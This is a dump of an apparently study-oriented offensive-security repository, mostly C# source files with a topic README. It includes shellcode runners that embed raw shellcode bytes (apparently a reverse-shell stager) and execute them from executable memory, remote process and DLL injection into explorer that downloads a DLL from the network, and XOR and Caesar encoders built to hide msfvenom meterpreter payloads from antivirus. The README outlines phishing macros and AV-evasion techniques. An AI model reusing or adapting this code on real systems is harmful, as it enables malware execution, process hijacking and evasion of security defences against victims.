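            // Size the allocation to the payload: the original fixed 0x1000 bytes
            // overflowed for any payload longer than one page.
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, MemCommitReserve, PageExecuteReadWrite);
            if (addr == IntPtr.Zero)
            {
                throw new Win32Exception(Marshal.GetLastWin32Error(), "VirtualAlloc failed");
            }

            Marshal.Copy(shellcode, 0, addr, shellcode.Length);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            if (hThread == IntPtr.Zero)
            {
                throw new Win32Exception(Marshal.GetLastWin32Error(), "CreateThread failed");
            }

            try
            {
                WaitForSingleObject(hThread, Infinite);
            }
            finally
            {
                CloseHandle(hThread);
            }
        }
    }
}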
-------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/XorEncoder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Program 8 | { 9 | public class XorEncoder 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[0] { }; 15 | 16 | byte[] encoded = new byte[buf.Length]; 17 | for (int i = 0; i < buf.Length; i++) 18 | { 19 | encoded[i] = (byte)(((uint)buf[i] + 5 ) ^ 0xff); // Caesar Shift of 5 with key as 0xff 20 | } 21 | 22 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 23 | int totalCount = encoded.Length; 24 | for (int count = 0; count < totalCount; count++) 25 | { 26 | byte b = encoded[count]; 27 | 28 | if ((count + 1) == totalCount) // Dont append comma for last item 29 | { 30 | hex.AppendFormat("0x{0:x2}", b); 31 | } 32 | else 33 | { 34 | hex.AppendFormat("0x{0:x2}, ", b); 35 | } 36 | 37 | if ((count + 1) % 15 == 0) 38 | { 39 | hex.Append("\n"); 40 | } 41 | } 42 | 43 | Console.WriteLine($"XOR Payload (KEY : 0xff):"); 44 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 45 | } 46 | } 47 | } -------------------------------------------------------------------------------- /Process Injection and Migration/C# Programs/process-injection.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace Inject 5 | { 6 | class Program 7 | { 8 | 9 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 10 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 11 | 12 | [DllImport("kernel32.dll", SetLastError = true, 
ExactSpelling = true)] 13 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 14 | 15 | [DllImport("kernel32.dll")] 16 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 17 | 18 | [DllImport("kernel32.dll")] 19 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 20 | 21 | static void Main(string[] args) 22 | { 23 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, 4804); 24 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 25 | byte[] buf = new byte[591] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x0a,0x41,0x89,0xda,0xff,0xd5 }; 26 | IntPtr outSize; 27 | WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize); 28 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 29 | } 30 | } 31 | } -------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/CaesarEncoder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Program 8 | { 9 | public class CaesarEncoder 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[0] { }; 15 | 16 | byte[] encoded = new byte[buf.Length]; 17 | for (int i = 0; i < buf.Length; i++) 18 | { 19 | encoded[i] = (byte)(((uint)buf[i] + 5 ) & 0xff); // Caesar Shift of 5 with key as 0xff 20 | } 21 | 22 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 23 | int totalCount 
= encoded.Length; 24 | for (int count = 0; count < totalCount; count++) 25 | { 26 | byte b = encoded[count]; 27 | 28 | if ((count + 1) == totalCount) // Dont append comma for last item 29 | { 30 | hex.AppendFormat("0x{0:x2}", b); 31 | } 32 | else 33 | { 34 | hex.AppendFormat("0x{0:x2}, ", b); 35 | } 36 | 37 | if ((count + 1) % 15 == 0) 38 | { 39 | hex.Append("\n"); 40 | } 41 | } 42 | 43 | Console.WriteLine($"AND Payload (KEY : 0xff):"); 44 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 45 | } 46 | } 47 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "commitMessage": "", 3 | "commitDateFormat": "DD-MM-YYYY HH:mm:ss", 4 | "autoSaveInterval": 0, 5 | "autoPushInterval": 0, 6 | "autoPullInterval": 0, 7 | "autoPullOnBoot": false, 8 | "disablePush": false, 9 | "pullBeforePush": true, 10 | "disablePopups": false, 11 | "listChangedFilesInMessageBody": false, 12 | "showStatusBar": true, 13 | "updateSubmodules": false, 14 | "syncMethod": "merge", 15 | "customMessageOnAutoBackup": false, 16 | "autoBackupAfterFileChange": false, 17 | "treeStructure": false, 18 | "refreshSourceControl": true, 19 | "basePath": "", 20 | "differentIntervalCommitAndPush": false, 21 | "changedFilesInStatusBar": false, 22 | "showedMobileNotice": true, 23 | "refreshSourceControlTimer": 7000, 24 | "showBranchStatusBar": true, 25 | "setLastSaveToLastCommit": false, 26 | "submoduleRecurseCheckout": false, 27 | "gitDir": "", 28 | "showFileMenu": true, 29 | "lineAuthor": { 30 | "show": false, 31 | "followMovement": "inactive", 32 | "authorDisplay": "initials", 33 | "showCommitHash": false, 34 | "dateTimeFormatOptions": "date", 35 | "dateTimeFormatCustomString": "YYYY-MM-DD HH:mm", 36 | "dateTimeTimezone": "viewer-local", 37 | "coloringMaxAge": "1y", 38 | "colorNew": { 39 | "r": 255, 40 | "g": 150, 41 | "b": 150 
42 | }, 43 | "colorOld": { 44 | "r": 120, 45 | "g": 160, 46 | "b": 255 47 | }, 48 | "textColorCss": "var(--text-muted)", 49 | "ignoreWhitespace": false, 50 | "gutterSpacingFallbackLength": 5, 51 | "lastShownAuthorDisplay": "initials", 52 | "lastShownDateTimeFormatOptions": "date" 53 | }, 54 | "autoCommitMessage": "vault backup: {{date}}" 55 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/styles.css: -------------------------------------------------------------------------------- 1 | :root { 2 | --advanced-tables-helper-size: 28px; 3 | } 4 | 5 | .HyperMD-table-row span.cm-inline-code { 6 | font-size: 100%; 7 | padding: 0px; 8 | } 9 | 10 | .advanced-tables-buttons>div>.title { 11 | font-weight: var(--font-medium); 12 | font-size: var(--nav-item-size); 13 | color: var(--nav-item-color); 14 | text-decoration: underline; 15 | } 16 | 17 | [data-type="advanced-tables-toolbar"] .nav-buttons-container { 18 | column-gap: 0.2rem; 19 | margin: 0.2rem 0 0.2rem 0; 20 | justify-content: start; 21 | } 22 | 23 | [data-type="advanced-tables-toolbar"] .nav-buttons-container::before { 24 | min-width: 2.6rem; 25 | line-height: var(--advanced-tables-helper-size); 26 | font-size: var(--nav-item-size); 27 | font-weight: var(--nav-item-weight); 28 | color: var(--nav-item-color); 29 | } 30 | 31 | [data-type="advanced-tables-toolbar"] .nav-buttons-container>* { 32 | height: var(--advanced-tables-helper-size); 33 | line-height: var(--advanced-tables-helper-size); 34 | } 35 | 36 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button { 37 | width: var(--advanced-tables-helper-size); 38 | height: var(--advanced-tables-helper-size); 39 | display: flex; 40 | justify-content: center; 41 | align-items: center; 42 | border-radius: var(--radius-s); 43 | } 44 | 45 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button:hover { 46 | background-color: 
var(--nav-item-background-hover); 47 | color: var(--nav-item-color-hover); 48 | font-weight: var(--nav-item-weight-hover); 49 | } 50 | 51 | .advanced-tables-row-label { 52 | width: 50px; 53 | } 54 | 55 | .widget-icon { 56 | width: 20px; 57 | height: 20px; 58 | fill: var(--text-muted); 59 | } 60 | 61 | .widget-icon:hover { 62 | fill: var(--text-normal); 63 | } 64 | 65 | .advanced-tables-csv-export textarea { 66 | height: 200px; 67 | width: 100%; 68 | } 69 | 70 | .advanced-tables-donation { 71 | width: 70%; 72 | margin: 0 auto; 73 | text-align: center; 74 | } 75 | 76 | .advanced-tables-donate-button { 77 | margin: 10px; 78 | } -------------------------------------------------------------------------------- /Process Injection and Migration/C# Programs/dll-injection.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Net; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | 7 | namespace Inject 8 | { 9 | class Program 10 | { 11 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 12 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 13 | 14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 15 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 16 | 17 | [DllImport("kernel32.dll")] 18 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 19 | 20 | [DllImport("kernel32.dll")] 21 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 22 | 23 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] 24 | static extern IntPtr GetProcAddress(IntPtr 
hModule, string procName); 25 | 26 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)] 27 | public static extern IntPtr GetModuleHandle(string lpModuleName); 28 | 29 | static void Main(string[] args) 30 | { 31 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 32 | String dllName = dir + "\\shell.dll"; 33 | WebClient wc = new WebClient(); 34 | wc.DownloadFile("", dllName); 35 | Process[] expProc = Process.GetProcessesByName("explorer"); 36 | int pid = expProc[0].Id; 37 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid); 38 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 39 | IntPtr outSize; 40 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); 41 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 42 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero); 43 | } 44 | } 45 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Topics 2 | 3 | - [Operating System and Programming Fundamentals](./Operating-System-and-Programming-Fundamentals/README.md) 4 | - Low Level Programming Languages 5 | - Programming Concepts 6 | - Windows Concepts 7 | - Windows on Windows 8 | - Win32 API 9 | - Windows Registry 10 | - [Client Side Code Execution with Office](./Client-Side-Code-Execution-With-Office/README.md) 11 | - Droppers 12 | - HTML Smuggling 13 | - Phishing With Microsoft Office 14 | - Basic Macro Payloads 15 | - Security Settings of Microsoft Office 16 | - Opening cmd.exe from macros 17 | - Powershell with Macros 18 | - Phishing user into disabling protected view and Enabling Macros 19 | - Shellcode Execution in word Memory 20 | - Interacting with Win32 API from VBA 21 | - In-Memory Shellcode runner in VBA 22 | - Shellcode Runner using Powershell 
23 | - Calling Win32 API from Powershell 24 | - Shellcode Runner in Powershell 25 | - In-Memory Shellcode Runner in Powershell 26 | - Problem with Add-Type 27 | - Leveraging UnsafeNativemethods 28 | - Reflection Shellcode Runner in Powershell 29 | - Working With Proxy 30 | - [Client Side Code Execution with Windows Script Host](./Client-Side-Execution-With-Windows-Script-Host/README.md) 31 | - Basic Dropper in Jscript 32 | - Jscript and C# 33 | - DotNetToJscript 34 | - Win32 API calls from C# 35 | - Shellcode Runner in C# using Win32 API 36 | - Jscript Shellcode Runner 37 | - SharpShooter 38 | - Reflective Load of Win32 API for In-Memory Powershell 39 | - [Process Injection and Migration](./Process%20Injection%20and%20Migration/README.md) 40 | - Process Injection 41 | - Process Injection Theory 42 | - Process Injection in C# 43 | - DLL Injection 44 | - DLL Injection Theory 45 | - DLL Injection in C# 46 | - Reflective DLL Injection 47 | - Process Hollowing 48 | - [Antivirus Evasion](./Antivirus%20Evasion/README.md) 49 | - Overview 50 | - Signature Based Detection 51 | - Bypassing AV with Metasploit 52 | - Encoders 53 | - Encrypters 54 | - Bypassing AV with C# 55 | - Caesar Cipher 56 | - Sleep Timers 57 | - Non-Emulated APIs 58 | - Bypassing AV with Office 59 | - AV Bypass with VBA 60 | - VBA Stomping 61 | - Powershell in VBA 62 | - Dechaining with WMI 63 | - Obfuscating VBA 64 | - [Advanced Antivirus Evasion](./Advanced%20Antivirus%20Evasion/README.md) 65 |   66 | 67 | # Disclaimer 68 | 69 | This repo is still work in progress. Any errors or suggestions can be conveyed by raising an issue. 
You can contact me directly on my [Discord](https://discordapp.com/users/706779776349765722) or [Twitter](https://twitter.com/xCipher007) 70 | -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/JscriptShellcode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | [ComVisible(true)] 5 | public class JscriptShellcode 6 | { 7 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 8 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,uint flAllocationType, uint flProtect); 9 | 10 | [DllImport("kernel32.dll")] 11 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, 12 | IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 13 | 14 | [DllImport("kernel32.dll")] 15 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 16 | public JscriptShellcode() 17 | { 18 | byte[] buf = new byte[375] 
{0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0x50,0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x7f,0x00,0x00,0x01,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 }; 19 | int size = buf.Length; 20 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 21 | Marshal.Copy(buf, 
0, addr, size); 22 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0,IntPtr.Zero); 23 | WaitForSingleObject(hThread, 0xFFFFFFFF); 24 | } 25 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/ShellcodeRunner.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace ShellcodeRunner 10 | { 11 | class Program 12 | { 13 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 14 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 15 | 16 | [DllImport("kernel32.dll")] 17 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 18 | 19 | [DllImport("kernel32.dll")] 20 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 21 | static void Main(string[] args) 22 | { 23 | byte[] buf = new byte[375] 
{0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0x50,0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x7f,0x00,0x00,0x01,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 }; 24 | int size = buf.Length; 25 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 26 | Marshal.Copy(buf, 
0, addr, size); 27 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 28 | WaitForSingleObject(hThread, 0xFFFFFFFF); 29 | } 30 | } 31 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/ReflectiveLoad.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace ReflectiveLoad 5 | { 6 | public class Class1 7 | { 8 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 9 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 10 | 11 | [DllImport("kernel32.dll")] 12 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 13 | 14 | [DllImport("kernel32.dll")] 15 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 16 | public static void runner() 17 | { 18 | byte[] buf = new byte[375] { 0xfc, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x60, 0x31, 0xd2, 0x89, 0xe5, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x49, 0x75, 0xef, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4c, 0x01, 0xd0, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0x50, 0x85, 0xc9, 0x74, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe0, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xe9, 
0x80, 0xff, 0xff, 0xff, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77, 0x73, 0x32, 0x5f, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0x89, 0xe8, 0xff, 0xd0, 0xb8, 0x90, 0x01, 0x00, 0x00, 0x29, 0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x68, 0x7f, 0x00, 0x00, 0x01, 0x68, 0x02, 0x00, 0x01, 0xbb, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40, 0x50, 0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56, 0x57, 0x68, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0xff, 0x4e, 0x08, 0x75, 0xec, 0xe8, 0x67, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7e, 0x36, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a, 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x6a, 0x00, 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x68, 0x00, 0x40, 0x00, 0x00, 0x6a, 0x00, 0x50, 0x68, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5, 0x57, 0x68, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x5e, 0x5e, 0xff, 0x0c, 0x24, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xe9, 0x9b, 0xff, 0xff, 0xff, 0x01, 0xc3, 0x29, 0xc6, 0x75, 0xc1, 0xc3, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5 }; 19 | int size = buf.Length; 20 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 21 | Marshal.Copy(buf, 0, addr, size); 22 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 23 | WaitForSingleObject(hThread, 0xFFFFFFFF); 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Operating-System-and-Programming-Fundamentals/README.md: -------------------------------------------------------------------------------- 1 | # Low Level Programming Languages 2 | 3 | Best examples are C and assembly. 
Code written in low-level languages is converted to opcodes through the compilation process and is executed directly by the CPU. Applications written in such languages must perform their own memory management and hence are also referred to as unmanaged code. 4 | 5 | > Opcode : A binary value that the CPU maps to a specific action 6 | 7 | Languages like Java and C# are Object Oriented Programming Languages and compile in a much different way. 8 | 9 | > Code > Processed by installed virtual machine > bytecode > opcodes 10 | 11 | Java uses the JVM (Java Virtual Machine), C# uses the CLR (Common Language Runtime) 12 | 13 |   14 | 15 | # Programming Concepts 16 | 17 | - **Class** : Template for creating Objects 18 | - An Object is instantiated from its class through a special method called the **Constructor** 19 | - A constructor is typically named after its class and is used to set up and initialize the instance variables of a class 20 | - **Modifier** : Determines the scope of a variable or method. 21 | 22 |   23 | 24 | # Windows Concepts 25 | 26 | ## Windows on Windows 27 | 28 | Most Windows-based operating systems are now 64-bit, but there are still some 32-bit applications. 29 | 30 | Microsoft introduced Windows on Windows 64-bit (**WOW64**), which allows 64-bit versions of the OS to execute 